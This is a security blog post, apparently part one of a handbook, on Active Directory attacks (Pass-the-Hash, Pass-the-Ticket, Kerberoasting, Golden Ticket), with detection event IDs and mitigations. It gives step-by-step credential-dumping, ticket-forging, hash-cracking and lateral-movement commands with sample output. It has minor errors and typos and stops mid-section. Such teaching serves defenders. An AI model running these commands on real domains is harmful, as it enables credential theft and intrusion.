---
title : 'The Complete Active Directory Security Handbook (Part-1)'
slug : 'complete-active-directory-security-handbook-1'
tags :
    - Personal
    - Web
    - Random Access Memories
    - Resource
    - Security
description : 'Exploitation, Detection, and Mitigation Strategies'
date : 2024-04-15
toc : true
scrolltotop : true
ShowLastmod : false
---

## Introduction

Active Directory (AD), introduced with Windows 2000 [^1], has become an integral part of modern organizations, serving as the backbone of identity infrastructure for 90% of Fortune 1000 companies [^2]. Active Directory is widely used by organizations for its simplicity and centralized management approach. It is an attractive solution for businesses as it makes it easier for employees to access resources and applications with a single set of credentials, which increases productivity and efficiency [^3]. Additionally, its centralized management structure provides a single point of control for IT administrators, allowing them to manage users, computers, and access to resources in one place [^4].

However, due to its widespread use and architectural limitations, Active Directory becomes a liability in the event of a security breach and becomes a priority target for adversaries seeking to elevate privileges, infect multiple systems, and launch devastating attacks such as data exfiltration, full system compromises, and ransomware.

The biggest challenges in recovery after an AD breach include identifying the source, determining the extent of damage, and creating a secure new environment. According to Verizon’s 2022 Data Breach Investigations Report [^5], 80% of breaches come from external agents, and as IBM's 2021 Cost of a Data Breach Report points out that once a domain admin is hacked, attackers can hide within your network for up to 277 days before detection, posing a significant threat [^6].

The widespread use and ease of access to resources for employees make it challenging for organizations to retire outdated Active Directory (AD) and adopt more secure alternatives like Microsoft Azure Active Directory (AAD). The transition to AAD addresses some of AD's limitations by automating administrative tasks such as user management and group membership assignment for improved efficiency [^7]. However, the same security risks still apply, as a compromise of the identity infrastructure can have devastating consequences. Adversaries can also exploit Microsoft Endpoint Manager to move laterally from an Azure tenant to an on-prem AD domain, creating attack paths between separate identity management environments [^8].

The importance of Active Directory security cannot be overstated, and organizations must be prepared with disaster recovery plans and vigilant monitoring to stop attacks before the system is corrupted or becomes irreparable. The choice between AD and AAD will largely depend on the needs and resources of the organization, but the risk of compromise remains regardless of choice. The secure and effective use of Active Directory requires a clear understanding of the potential risks and a commitment to security practices and protocols.

## Active Directory
Active Directory (AD) is a crucial directory service for managing network resources in Windows-based networks. It enables the centralization of management for various network resources, including user and computer accounts, resources, and security policies. In this way, AD facilitates efficient and secure management of networks in a hierarchical structure.

AD operates on a hierarchical structure consisting of domains at the top level and various objects nested within, such as users, computers, and groups. The structure is designed to provide an organized and efficient way of managing network resources, and it ensures that security policies are enforced consistently across the network.

AD uses Lightweight Directory Access Protocol (LDAP) for communication between domains and domain controllers. LDAP is a directory service protocol that enables the management of distributed directory services over an IP network. Additionally, AD employs Kerberos, a secure authentication protocol for authentication over a network. This ensures that only authorized users and computers can access network resources, thereby enhancing network security.

To manage network resources efficiently, Active Directory uses Group Policy Objects (GPOs). GPOs are used to control and enforce security policies, software deployment, and other administrative tasks across the network. AD also provides support for Remote Procedure Calls (RPCs), allowing for remote management of network resources. This ensures that network administrators can efficiently manage network resources from a  centralized location, regardless of the location of the resources themselves.

However, Active Directory is not immune to attacks, and attacks on AD can result in disastrous consequences for the network. Successful Active Directory attacks consist of three primary steps: discovery, privilege escalation through theft of valid account credentials, and gaining access to other computers in the network/domain. Once attackers gain a foothold in the target network, they immediately shift their focus to gaining elevated access to additional systems that will help them accomplish their final goal, such as encrypting and exfiltrating organizational data.

In summary, Active Directory is a vital component for managing and securing network resources in Windows-based networks. Its hierarchical structure and various features, such as LDAP and Kerberos, GPOs, and RPCs, provide efficient and secure management of network resources. To keep your network secure, it is critical to protect Active Directory from attacks by implementing strong security measures and keeping security protocols up-to-date to prevent unauthorized access to network resources.

## Use of Alternate Authentication Methods (T1550)

Adversarial attacks on a system can often bypass normal access controls by using alternate authentication materials such as password hashes, Kerberos tickets, and application access tokens. This technique, known as T1550 in the MITRE ATT&CK framework, enables attackers to move laterally within an environment and gain unauthorized access.

This section will provide a detailed description of two sub-techniques of the Use Alternate Authentication Methods (T1150) technique: Pass-the-Hash (T1550.002) and Pass-the-Ticket (T1550.003).

### Pass-the-Hash (T1550.002)

Pass-the-Hash (PtH) is an identity-based attack that is leveraged by attackers to gain access to additional systems and privileges within a network once they have already compromised the system.

In a typically Pass-the-Hash scenario, adversaries
* gain initial access to a target network,
* steals/dumps “hashed” user credentials,
* uses dumped credentials

to create a new user session on the compromised host.

As opposed to other attacks, Pass-the-Hash attacks represent a unique form of credential theft in which an attacker leverages the Windows New Technology LAN Manager (NTLM) authentication protocol to authenticate to a remote system using the pre-computed hash of a valid user's password. When a user logs into a Windows system that relies on the NTLM protocol, the system generates an NTLM hash of the user's password without leveraging a technique called **salting** that enhances the security of hashed passwords stored on servers and domain controllers.

{{< admonition info >}}
A hash is a unique digested output of a one-way mathematical function that takes an input of various sizes (could be as long as a classical novel or short as an 8-digits password) and returns a fixed-size string of characters. As these functions are designed to be one-way, meaning that having an output, it should be computationally infeasible for an adversary to reverse the output, i.e., to gain the cleartext input, password hashing is still a prevalent security practice against data-breach attacks.
{{< /admonition >}}

**NTLM** is a single sign-on method that utilizes a challenge-response system to verify the user's identity without requiring the user's password. Therefore, this attack technique does not require adversaries to use any third-party cracking tools, as the plaintext version of the password is not needed; therefore, it eliminates the need to perform time-consuming cracking operations.

If an attacker obtains the NTLM hash of a user's password through means such as extracting it from lsass.exe memory or from the %systemroot%\system32\config\SAM file, capturing it during network transmissions, or dumping it from a backup or image of a system, they can utilize the hashed password by passing the hash to a remote system that recognizes the compromised user's account. Depending on the privileges and level of access of the compromised user, adversaries may gain full system access and successfully perform lateral movement attacks.

{{< admonition info >}}
It is important to note that this is not a vulnerability, but rather a deliberate design choice aimed at reducing friction and improving the overall user experience.
{{< /admonition >}}

### Tools and Techniques to Perform Pass-the-Hash Attacks

Pass-the-Hash (PtH) attacks can be executed by utilizing various publicly available tools, such as Mimikatz [^9] and evil-winrm [^10], as well as built-in PowerShell cmdlets. Attackers often employ these tools or commands to extract the hash from the memory of a compromised system and then use it to gain access to other systems on the network.

#### Tool 1: Mimikatz
The usage of Mimikatz for the Pass-the-Hash attack consists of three main steps.

##### Step 1: Stealing the password hash
To dump a list of recently logged-on users and their OS credentials, adversaries often use the sekurlsa module in Mimikatz, which leverages a number of different techniques to extract authentication information from LSASS memory, including parsing memory structures and using Windows APIs. The "logonpasswords" function of this module specifically extracts login session data such as saved password hashes and cached credentials. This can include the current user's logon information, as well as information for other users who have logged onto the same machine.

Note that before leveraging the sekurlsa::logonpasswords command, attackers need to run the privilege::debug command so that the Mimikatz can run properly.

{{< admonition info >}}
By default, LSASS runs with high integrity and is protected from being debugged by unauthorized processes. However, by enabling the debugger privilege, the attacker can bypass this protection and access LSASS memory to extract the logon session data.
{{< /admonition >}}

Below, you will find an example output of step one.

```
PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

Authentication Id : 0 ; 302247 (00000000:00049ca7)
Session           : UndefinedLogonType from 0
User Name         : Alice
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 12/01/2023 15:13:19
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
        msv :
          [00000003] Primary
          * Username : Alice
          * Domain   : DOMAIN
          * NTLM     : a0c8746a6efc7782c7c19c55185145be
```
Having this NTLM hash, it is time for adversaries to jump to the second stage.

It is important to note that Mimikatz is not the only way to dump NTLM hashes. Adversaries often leverage other built-in command-line applications or third-party tools, such as ProcDump [^11] and Gsecdump [^12], for credential dumping.

##### Step 2: Authentication through the stolen password hash
This is the main step where the adversary passes the hash to impersonate the user and gain access to the remote system.

The "sekurlsa::pth" command in Mimikatz is a feature that facilitates "Pass-the-Hash" attacks. This technique allows an attacker to authenticate to a remote system by using a captured NTLM hash of a user's password, without the need for the actual password. To execute this command, the attacker must provide only the following parameters:

* /user: (the username),
* /domain: (the domain name), and
* /ntlm: (the NTLM hash of the user's password).

{{< admonition info >}}
Note that Windows passwords are not only limited to the NTLM protocol, but may also use popular block encryption algorithms like AES-128 and AES-256 for password
storage. In such cases, adversaries would need to use the /aes128: or /aes256: parameters instead of /ntlm:.
{{< /admonition >}}

```
PS> .\mimikatz.exe "sekurlsa::pth /user:Alice /domain:domain.com

/ntlm:a0c8746a6efc7782c7c19c55185145be"

user    : Alice
domain  : domain.com
program : cmd.exe
impers. : no
NTLM    : a0c8746a6efc7782c7c19c55185145be
. . .
```
Notice how easily we gained access to a remote system without knowing only the username and NTLM hash of the victim’s password.

##### Step 3: Accessing resources through new user account
In the third step, the attacker uses the newly obtained user account to expand their network access. For instance, the adversary can use a command-line utility called PsExec to perform remote code execution on another host.

For instance, the attacker can run the following command to run the "cmd.exe" process on the remote machine with an internal IP address "192.168.52.146":

```
psexec.exe \\192.168.52.146 cmd.exe
```
Mimikatz is not the only way to perform a Pass-the-Hash attack. Adversaries often use the PowerShell, too.

#### Tool 2: PowerShell
It is common for adversaries to use the Invoke-WMIExec cmdlet, which allows execution of arbitrary commands on a remote Windows machine using WMI (Windows Management Instrumentation), to perform a PtH attack.

{{< admonition info >}}
Note that Invoke-WMIExec is a built-in PowerShell cmdlet that is present in many recent Windows systems. This feature enables the execution of arbitrary commands
on a remote Windows machine through Windows Management Instrumentation (WMI). You can run Invoke-WMIExec directly from a PowerShell prompt or integrate it into a
PowerShell script.

Being a built-in cmdlet makes the attack using Invoke-WMIExec more covert, as it does not require any additional downloads or installations.
{{< /admonition >}}

For instance, having a password hash of the user called Alice from our previous scenario, an adversary can run the following command.

```
Invoke-WmiExec -target 192.168.52.146 -hash a0c8746a6efc7782c7c19c55185145be -username Alice -command hostname
```
In the command above, an adversary is using the Invoke-WmiExec script to run the command "hostname" on the remote machine with the internal IP address 192.168.52.146.

#### Tool 3: evil-winrm
The "evil-winrm" tool is a Ruby gem that enables the execution of remote commands on a Windows machine using the Windows Remote Management (WinRM) protocol. As evil-winrm is not a built-in tool, adversaries have to install it before the use. Various installation options are available in the corresponding GitHub repository [^10].

In a Pass-the-Hash attack using evil-winrm, the attacker specifies the username, NTLM hash, and IP address of the target system as parameters in the evil-winrm command [^13].

For example, the following command can be used to perform a PtH attack on a Windows machine with IP address 192.168.52.146, using the username "Alice" and the NTLM hash "a0c8746a6efc7782c7c19c55185145be":

```
evil-winrm -u Alice -H a0c8746a6efc7782c7c19c55185145be -i 192.168.52.146
```
With this information, evil-winrm establishes a remote connection to the target system and authenticates as the specified user (Alice), allowing the attacker to execute arbitrary commands on the remote machine.

#### Detection Methods for the Pass the Hash Attack
Below, known Event IDs are added to detect a possible Pass-the-Hash attack [^14], [^15], [^16], [^17]:

**Event ID 1** - Process Create.
* Key Description Fields: LogonId, ParentProcessId, ParentImage, CurrentDirectory, CommandLine, IntegrityLevel, ParentCommandLine, ParentCommandLine, UtcTime,ProcessId, User, Hashes, Image

**Event ID 5** - Process terminated.
* Key Description Fields: UtcTime, ProcessId:, Image 

**Event ID 10** - Process accessed.
* Key Description Fields: SourceThreadId, TargetProcessId, GrantedAccess,SourceImage, TargetImage

**Event ID 4624** - An account was successfully logged on.
* Key Description Fields: Account Name, Account Domain, Logon ID

**Event ID 4663** - An attempt was made to access an object.
* Key Description Fields: Process ID, Access Mask, Account Domain, Object Name, Process Name, Object Type, Logon ID, Handle ID

**Event ID 4672** - Special privileges assigned to new logon.
* Key Description Fields: Security ID, Account Name, Account Domain

**Event ID 4688** - A new process has been created.
* Key Description Fields: Required Label, Account Domain, Source Process Name, NewProcess Name, Token Escalation Type, New Process ID, Source Process ID

#### Mitigation Techniques for the Pass the Hash Attack
To mitigate the risk of pass-the-hash attacks, organizations can employ several technical measures. One such measure is to enable Windows Defender Credential Guard, a feature that was introduced in Windows 10 and Windows Server 2016. This tool leverages virtualization to secure credential storage and restrict access to trusted processes only.

Another measure is to revoke administrator privileges from user workstations. This limits an attacker's ability to execute malware and extract hashes from LSASS.exe. Additionally, limiting the number of endpoints that users have administrative privileges on and avoiding administrative privileges across security boundaries reduces the risk of a compromised credential being used to escalate privileges.

Randomizing and storing local administrator passwords with a solution like Microsoft's Local Administrator Password Solution (LAPS) also adds an extra layer of security, as it reduces an attacker's ability to move laterally with local accounts that share the same password. It is also recommended to prevent local accounts from authenticating over the network, which can be achieved through the use of well-known SID's in group policies.

## Pass-the-Ticket (T1550.003)
Pass the Ticket (PtT) is a technique that allows an attacker to use a previously acquired Kerberos Ticket Granting Ticket. The TGT is a crucial component of the Kerberos protocol, as it enables a user to authenticate to multiple systems without having to enter their password each time.

{{< admonition info >}}
The Ticket Granting Ticket (TGT) is a type of ticket issued by the Domain Controller (DC) to a user upon successful authentication to the domain. It includes crucial information such as the user's session key, group membership, and privileges, which are used to request service tickets for specific services on target systems. Kerberos encrypts the TGT using the user's password hash and employs symmetric encryption algorithms (such as DES or AES) depending on the configuration of the Kerberos environment. After encryption, the TGT is sent to the user's computer and stored in memory.

When the user wants to access a resource on another system, they use the TGT to request a service ticket from the DC. The service ticket is also encrypted with the user's session key, and it contains an encrypted session key that can be used to authenticate to the target system. The service ticket is then sent to the user's computer, where it is used to authenticate to the target system.
{{< /admonition >}}
Having a stolen TGT key, an adversary can request a service ticket from the DC for a specific service on a target system to gain access to its resources.

### Tools and Techniques to Perform Pass-the-Ticket Attacks
Pass-the-Ticket (PtH) attacks can be executed by utilizing various publicly available tools, such as Mimikatz, Kekeo [^18], Rubeus [^19], Creddump7 [^20], etc. Attackers often employ these tools to extract Kerberos TGTs from the memory of a compromised system and then use them to gain access to other systems on the network.

#### Tool 1: Mimikatz
Usage of Mimikatz for the PtT attack consists of four main steps.

##### Step 1: Capturing Kerberos tickets for valid accounts
An attacker can use the sekurlsa::tickets Mimikatz command with the /export parameter to extract all the Kerberos tickets from memory and save them as .kirbi files and save them in the same folder where the Mimikatz executable file is located.

By examining the names of the .kirbi files, it is possible to determine if there are any Kerberos tickets for a domain administrator, such as DOMAIN\Alice:
```
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
PS> dir | findet "Alice" | findstr "krbtgt"
...
[0;1e4c7df]-2-0-40e10000-Alice@krbtgt-DOMAIN.COM.kirbi
...
```
The second command, dir | findet "Alice" | findstr "krbtgt", lists all the files in the current directory and pipes the output to the findstr command to search for the text "krbtgt". The purpose of this command is to find the Kerberos ticket file(s) related to the user "Alice", which may include the "krbtgt" string in the file name.

{{< admonition info >}}
Note that Mimikatz is not the only tool to obtain Kerberos tickets. Adversaries can employ the Rubeus tool to generate raw AS-REQ traffic in order to ask for a TGT with a provided username and password.
{{< /admonition >}}
The advantage of this attack is that the password supplied to Rubeus can be encrypted in RC4, DES and AES algorithms, and the attack still would work [^21].

##### Step 2: Reusing the ticket
This is the main step of the Pass-the-Ticket attack.

In this step, the attacker employs the Mimikatz command kerberos::ptt to insert the obtained TGT into their own session, resulting in their session taking on the identity and permissions of the stolen TGT for future access to resources without knowing the plaintext credentials.

This allows the adversary to access resources that would otherwise be protected by Kerberos authentication [^22].
```
PS> mimikatz.exe "kerberos::ptt
C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-Alice@krbtgt-DOMAIN.COM.kirbi"

* File:
'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK
```
Note that the above command is used to insert the Kerberos Ticket Granting Ticket (TGT) stored in the corresponding .kirbi file into the current session.

To make sure that the right ticket was injected, an adversary can use the “kerberos::list” Mimikatz command.

```
PS> mimikatz.exe "kerberos::list"

[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 13/01/2022 09:47:44 ; 13/01/2022 09:47:44 ; 13/01/2022 09:47:44
Server Name     : krbtgt/DOMAIN.COM @ DOMAIN.COM
Client Name     : Alice @ DOMAIN.COM
Flags 40e10000  : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
```
{{< admonition info >}}
It is important to mention that the TGT has a finite lifetime, and it will expire after a certain period of time. The user will need to re-authenticate to the domain to obtain a new TGT.
{{< /admonition >}}

##### Step 3: Discovering privileges of the stolen ticket
Once an obtained ticket is ready for reuse, the attacker needs to identify its capabilities, i.e., where it can be utilized. A TGS can only provide access to the specific resource it was issued for, and the attacker can find out that information by examining the TGS.

To use a TGT, the attacker may have to perform an internal discovery phase to figure out the access it grants. This can be as simple as checking the user's group memberships and looking for clear signs.
{{< admonition info >}}
Numerous tools can be employed to gather information about Active Directory.
However, an attacker can also use built-in commands like "net" to gather such
information without alerting security controls.
{{< /admonition >}}

```
PS> net user Alice /domain
The request will be processed at a domain controller for domain domain.com.

User name                   Alice  
Full Name                   Alice Oswell
Comment
User's comment
Country/region code         000 (System Default)
Account active              Yes
Account expires             Never
. . .
Local Group Memberships
Global Group memberships    *Workstation Administrators *VPNUser
                            *FileServer1_PublicShare *Domain Users
The command completed successfully.
```
##### Step 4: Accessing resources through new user account
Lastly, the attacker can employ built-in OS utilities to move laterally in a stealthy manner so that they can try and gain access to other resources and further their goals. For instance, the adversary might leverage the PsExec command-line utility to run the powershell.exe on a remote workstation.

#### Detection Methods for the Pass the Ticket Attack
Below, known Event IDs are added to detect a possible Pass-the-Ticket attack [^14], [^15]:

**Event ID 4768** - A Kerberos Authentication Ticket (TGT) was requested.
* Key Description Fields: Account Name, Service Name (always "krbtgt"), Service ID, Client Address

**Event ID 4769** - A Kerberos Service Ticket was requested.
* Key Description Fields: Account Name, Service Name, Client Address

**Event ID 4770** - A Kerberos Service Ticket was renewed.
* Key Description Fields: Account Name, User ID, Service Name, Service ID

#### Mitigation Techniques for the Pass the Ticket Attack
Effective measures to counter pass-the-hash attacks concentrate on making tickets more difficult to steal and limiting the potential impact of a stolen ticket. One such measure is to utilize Microsoft's Windows Defender Credential Guard. This technology, which was introduced in Windows 10 and Windows Server 2016, leverages virtualization to secure credential storage and provide access only to trusted processes.

Another important step is to limit the number of endpoints where users have administrative privileges. This significantly reduces the risk of an attacker using a stolen ticket for lateral movement. It is also important to avoid granting administrative privileges across security boundaries, as this greatly reduces the risk of an attacker using a stolen ticket to escalate their privileges.

## Kerberoasting
Kerberoasting is a technique used to obtain password hashes for Active Directory (AD) user accounts that have servicePrincipalName (SPN) values.

In AD environments, SPNs are registered to user or computer accounts, known as "service accounts." These accounts are utilized to run services and applications, and they are usually granted the least privilege necessary to perform their function. When a client requests a service from a server, it employs the SPN to locate the service account linked with the service. The client then authenticates to the service using the service account's credentials, which are stored as a password hash in AD.

In the case of Kerberoasting, an attacker can exploit the SPN value of a service account to request a service ticket (TGS). The TGS ticket may be encrypted (via RC4) with the password hash of the service account assigned to the requested SPN as the key. This means that an attacker who captures TGS tickets in network traffic or extracts them from memory can extract the password hash of the service account and perform an offline brute force attack to recover the plaintext password.

Note that Kerberoasting and Pass-the-Ticket attacks are two different techniques used to steal or impersonate valid credentials in a Kerberos environment.
{{< admonition info >}}
Kerberoasting is a method of obtaining service account credentials by requesting service tickets from a domain controller and cracking them offline. It allows the attacker to gain access to network resources by using the service account's password hash. Pass-the-Ticket, on the other hand, is a technique where an attacker steals a Kerberos ticket-granting ticket (TGT) from a user's session and uses it to impersonate the user to gain access to network resources.
{{< /admonition >}}
Kerberoasting attacks can be executed by utilizing various publicly available tools and utilities, such as Impacket scripts.

### Tools and Techniques to Perform Kerberoasting
For this attack, not just one tool is used, but rather a collaboration of them, such as Mimikatz, Rubeus, Impacket, John the Ripper, Hashcat.
#### Tool 1: Impacket
The Kerberoasting attack leveraging the Impacket script consists of three main parts.
##### Step 1: Identifying the SPNs and requesting TGSs
The first step in Kerberoasting attacks is to enumerate (or identify) servicePrincipalNames and request service tickets (TGS). 
The Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN and valid domain credentials [^23]
```
# with a password
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'

# with an NT hash
GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER
```
The command above uses the GetUserSPNs.py script and specifies an output file, "kerberoastables.txt", where the obtained password hashes will be stored. 

The -dc-ip flag to specify the IP address of the domain controller and the -outputfile flag to specify where the obtained password hashes will be saved. It also uses the 'DOMAIN/USER:Password' or 'DOMAIN/USER' argument to provide the domain, username and password/NT hash of a valid domain user to request the ST.

Note that adversaries can also leverage the CrackMapExec (CME) tool to perform Kerberoasting against a list of systems specified by $TARGETS [^23].
```
crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter
```
{{< admonition info >}}
The command above uses the --kerberoasting flag to specify an output file to save the obtained password hashes and --kdcHost flag to specify the IP address of the domain.
{{< /admonition >}}

##### Step 2: Offline cracking of the hash
Having stolen passwords in the kerberoastables.txt file, the adversary can perform an offline brute force attack to obtain the plaintext password using the third-party tools, such as John the Ripper and Hashcat.
```
john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt
```
The command above uses the --format=krb5tgs flag to specify that the hashes in the file "kerberoastables.txt" are in the format of Kerberos 5 TGS (Ticket Granting Service) and --wordlist flag to specify the location of the wordlist file to use in the cracking process. Once the command is executed, John will try to find a match between the password hashes and the words in the wordlist file.

##### Step 3: Using new privileges to further objectives
Once the password has been cracked, the attacker can use the service account's credentials to access network resources and further their objectives. This can include exfiltrating data, moving laterally within the network, or escalating their privileges.

#### Tool 2: Rubeus
The Kerberoasting attack that leverages Rubeus consists of four main parts.
##### Step 1: Enumerate servicePrincipalNames
First step of a Kerberoasting attack is to identify and enumerate the Service Principal Names (SPNs) of the targeted service accounts with desirable privileges.

For this reason, adversaries can develop customized LDAP filters to look for users with SPN values registered for current domain [^24].
```
$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
#Execute Search
$results = $search.FindAll()
#Display SPN values from the returned objects
$Results = foreach ($result in $results)
{
$result_entry = $result.GetDirectoryEntry()
$result_entry | Select-Object @{
Name = "Username"; Expression = { $_.sAMAccountName }
}, @{
Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object
-First 1 }
}
}
$Results
```
{{< admonition info >}}
Note that SPNs are composed of two parts:
* the service class and
* the host name. 

The service class is the name of the service, such as "HTTP" or "ldap", and the host name is the DNS host name or the IP address of the machine where the service is running. For example, an SPN for a web server might be "HTTP/webserver1.example.com", where "HTTP" is the service class and "webserver1.example.com" is the host name.
{{< /admonition >}}
The possible output of this LDAP filter is the following:
```
Username        SPN
--------        ---
ServiceAccount1 http/webserver1
ServiceAccount2 cifs/appserver2
```
##### Step 2: Requesting TGS tickets
An attacker can target specific service accounts by identifying and enumerating their Service Principal Names (SPNs) and then request Ticket Granting Service (TGS) tickets for these service accounts. Tools such as Rubeus can be used to automate this process by extracting the password hashes from memory [^25].
```
PS> .\Rubeus.exe kerberoast /simple /outfile:passwordhashes.txt

[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 2
[*] Hash written to C:\Tools\hashes.txt
[*] Roasted hashes written to : C:\Tools\hashes.txt

PS> Get-Content .\passwordhashes.txt

$krb5tgs$23$*ServiceAccount1$domain.com$http/webserver1*$45FAD4676AECDDE4C1397BF
CED441F79$DEB. . .

# ... output truncated ... #
```
##### Step 3: Cracking the password online
The next step in the attack is to obtain the plaintext passwords of the service accounts, this process is done by using an offline brute-force attack, which means that the attacker doesn't need to communicate with the active directory making it undetectable.

To perform this task, the attacker can use different tools such as John the Ripper and Hashcat, that are designed specifically for password cracking with dictionaries of common passwords:
```
PS> .\hashcat.exe -m 13100 -o cracked.txt -a 0 .\passwordhashes.txt .\wordlist.txt
```
The command uses the hashcat.exe executable and specifies the following flags:
* -m 13100: This flag is used to specify the hash type, in this case Kerberos 5 TGS (Ticket Granting Service)
* -o cracked.txt: This flag is used to specify the output file where the cracked passwords will be saved
* -a 0: This flag is used to specify the attack mode, in this case 0 stands for "Straight" attack mode.

The command also specifies the file paths of the passwordhashes.txt and wordlist.txt. Once the command is executed, Hashcat will try to find a match between the password hashes in the passwordhashes.txt file and the words in the wordlist.txt file.

##### Step 4: Using new privileges to further objectives
Once the password has been cracked, the attacker can use the service account's credentials to access network resources and further their objectives. For instance, having the account credentials, the adversary can use the runas tool with the /netonly parameter to run PowerShell as the "ServiceAccount1" user

#### Detection Methods for the Kerberoasting Attack
It is possible to identify various signs of Kerberoasting by observing the Windows event log for unusual requests for ticket-granting service (TGS) [^26], [^27].
**Event ID 4769** - A Kerberos Service Ticket was requested.
* Key Description Fields: Account Name, Service Name, Client Address

**Event ID 4770** - A Kerberos Service Ticket was renewed.
* Key Description Fields: Account Name, User ID, Service Name, Service ID

#### Mitigation Techniques for the Kerberoasting Attack
To safeguard service account passwords from Kerberoasting attacks, several measures can be taken such as [^28]:
##### Mitigation Technique 1: Rejecting authentication requests not using Kerberos Flexible Authentication Secure Tunneling (FAST) 
This is also known as Kerberos Armoring. This pre-authentication extension creates a secure channel between the client and the domain controller, aiming to enhance the protection of Kerberos tickets from offline password cracking attempts. While FAST can eradicate the threat posed by Kerberoasting, implementing it quickly and effectively in an organization can prove to be challenging.

##### Mitigation Technique 2: Eliminating the use of insecure protocols in Kerberos
Although completely disabling RC4 is a major task, it is possible to configure individual service accounts to not accept the RC4 protocol. By setting the attribute msDS-SupportedEncryptionTypes to 0x18 (decimal 24), only AES128 and AES256 will be enabled. This change not only improves security but also makes it easier to detect malicious activity as the use of RC4 in a TGS request is a stronger indicator.

##### Mitigation Technique 3: Adopting strong password hygiene practices for service accounts
Service account passwords should be randomly generated, have a minimum length of 30 characters, and be changed frequently.

## Golden Ticket Attack
The Golden Ticket attack involves forging a Kerberos ticket to gain unauthorized access to a computer system as a privileged user. To carry out the attack, an attacker must obtain the NTHash of the krbtgt account, the account responsible for encrypting and signing all tickets within a domain, as well as the domain's Security Identifier (SID). With this information, the attacker can create a fraudulent golden ticket that mimics a legitimate ticket issued by the domain's authentication server. This golden ticket provides the attacker with the ability to access sensitive information and resources on the targeted system. 

### Tools and Techniques to Perform a Golden Ticket Attack
Adversaries can use multiple third-party tools such as Mimikatz and Impacket to perform a Golden Ticket attack.

#### Tool 1: Impacket
In this scenario, we will assume that upon performing a Kerberoasting attack, an attacker dumped a file of hashes and cracked them to gain administrator access to the Domain Controller. In other words, we have the plaintext password of an administrator user that can access the DC. In addition, our domain name will be EXAMPLE.local for efficiency.

A typical Golden Ticket attack with Impacket consists of two main parts.

##### Step 1: Forging a golden ticket
To create a valid golden ticket, certain information is required, such as the NTHash of the domain controller's krbtgt account and the domain SID. This information can be obtained by using the secretsdump.py script from Impacket, provided that the attacker has administrator access to the domain controller. Below, you will find the proper syntax to dump NTHash for the krbtgt account [^29].
```
secretdump.py Administrator:"Password"@<DC_IP_Address>
```
Assume that NTHash is bf106a6860c6f7b3317c653a38aba33.

Next, the attacker needs to learn the domain SID. For this, they can leverage Impacket’s lookupsid.py tool. Note that even though the attacker chooses the DC as the target, this attack works with any domain controller.
```
lookupsid.py EXAMPLE.local/Administrator:"Password"@<DC_IP_Address>
```
Assume that the domain SID is S-5-1-5-21-2049251289-867822404-1193079966.

Finally, the attacker uses Impacket’s ticketer.py tool to forge a golden ticket for a domain user. One advantage of the ticketer.py is that the forged ticket gets written to a .ccache file instead of .kirbi; in other words, the attacker does not have to convert it.
```
ticketer.py -nthash bf106a6860c6f7b3317c653a38aba33 -domain-sid "S-5-1-5-21-2049251289-867822404-1193079966" -domain EXAMPLE.local Alice
```
Note that the command above is an example of an attacker forging a golden ticket for a non-existent domain administrator Alice.

##### Step 2: Using a golden ticket
To set up the golden ticket for use, the KRB5CCNAME environment variable needs to be set to the path of the .ccache file, which can be an absolute or relative file path. The KRB5CCNAME environment variable is used to inform Impacket tools that support Kerberos tickets where to find the ticket. This allows the attacker to use the golden ticket to access the system as a privileged user [^29].

Next, the adversary can use Impacket’s command execution tools, such as psexec.py, smbexec.py, or wmiexec.py, to load and authenticate with the ticket, eventually giving the adversary a command execution. For Kerberos authentication to work, the adversary has to provide the IP address of the target, the IP address of the Domain Controller, and the domain name.
```
psexec.py $EXAMPLE.local/$Administrator@$TARGET_NAME -target-ip $TARGET_IP -dc-ip $DC_IP -no-pass -k
```
Note that while the -no-pass option tells the script to skip password-based authentication, the -k option specifies that the Kerberos ticket should be taken from the KRB5CCNAME environment variable. The purpose of this script is to remotely execute commands on the target computer using Kerberos authentication without having to enter a password.

#### Tool 2: Mimikatz
A typical Golden Ticket attack with Impacket consists of three main parts.
##### Step 1: Compromising the password hash for the krbtgt account
As it was the case with the Impacket scenario, for a Golden Ticket attack to work, an adversary has to have administrator access to a Domain Controller. Hence, we will start with this assumption.

To exfiltrate the password hash of the krbtgt user, the attacker can use the “lsadump::dcsync” command.
```
PS> mimikatz.exe "lsadump::dcsync /user:DOMAIN\KRBTGT"

SAM Username          : krbtgt
User Principal Name   : krbtgt@DOMAIN.com
Password last change  : 09/03/2020 14:51:03
Object Security ID    : S-1-5-21-5840559-2756745051-1363507867-502 #

Credentials:
  Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159 # NTLM Hash
. . .
aes256_hmac (4096) :
ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
. . .
```
Notice that "lsadump::dcsync /user:DOMAIN\KRBTGT" is a command-line argument for Mimikatz that tells it to perform a "DCSync" operation using the user account "DOMAIN\KRBTGT", which is the default account used by the Kerberos authentication service in Windows Active Directory environments [^30].

##### Step 2: Forging Kerberos tickets
Upon obtaining access to the KRBTGT password hash, they can use Mimikatz to forge Kerberos tickets. This can involve creating a fake ticket-granting ticket (TGT) for a nonexistent user account.
